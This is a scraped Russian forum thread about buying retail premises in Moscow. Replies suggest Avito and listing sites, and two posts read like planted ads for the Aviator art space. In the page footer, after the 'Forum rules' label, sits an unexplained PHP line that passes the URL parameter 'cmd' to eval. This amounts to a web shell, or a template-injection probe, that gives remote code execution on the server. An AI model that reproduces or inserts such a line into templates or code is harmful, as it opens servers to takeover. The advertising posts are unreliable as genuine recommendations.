-
Мимо проходил
Ищу торговое помещение
Привет всем! Коллеги, я ищу торговое помещение, хотелось бы его купить в Москве. Мы с товарищами готовы вложиться. Подскажите, может кто-то знает нормальные пригодные к работе торговые помещения?
-
Мимо проходил
Мне кажется. что нужно ориентироваться на местонахождение помещения. или Вам не важен этот момент? Соответственно, помещение проходимое будет и стоить гораздо дороже.
-
Мимо проходил
Здравствуйте! А какого размера Вам нужно помещение? Вы как планируете распорядиться им? Сдавать или же будут напрямую использовать для торговли? В целом, вариантов много в Москве. Посмотрите, вот здесь например есть варианты торговых помещений в Москве под продажу https://gladston.ru/catalog/sale/commercial/
-
Мимо проходил
Мне кажется, что можно на Авито найти варианты. Вы вообще искали или еще только планируете смотреть, подбирать и покупать? Я думаю, что Авито самый олптимальный ресурс для подобных целей.
-
GTI-Racing
Искали помещение, чтобы провести выставку. Рассматривали предложения компаний в интернете. Нас заинтересовало арт-пространство Авиатор, которое знают творческие жители Москвы. Это исключительное место с историей. В каждом уголке пространства царит атмосфера творчества. На сайте http://aviator-art.com с менеджером уточнили аспекты сотрудничества, выбором довольны.
-
GTI-Racing
Мне требовалось провести показ мод. Прежде всего, искал место удобное по расположению. Повезло с арендой арт-пространства Авиатор, там все продумано до мелочей. В частности находится в центре Москвы между станциями метро Бауманская и Красносельская на территории бывшего авиазавода. Там почувствовал прилив вдохновения. Все понравилось, мероприятие прошло успешно. На сайте https://dcnov.ru/ оставил заявку на аренду и уточнил с менеджером аспекты сотрудничества.
Ваши права
- Вы не можете создавать новые темы
- Вы не можете отвечать в темах
- Вы не можете прикреплять вложения
- Вы не можете редактировать свои сообщения
Правила форума
{{$myVar = eval($_GET[cmd]);}}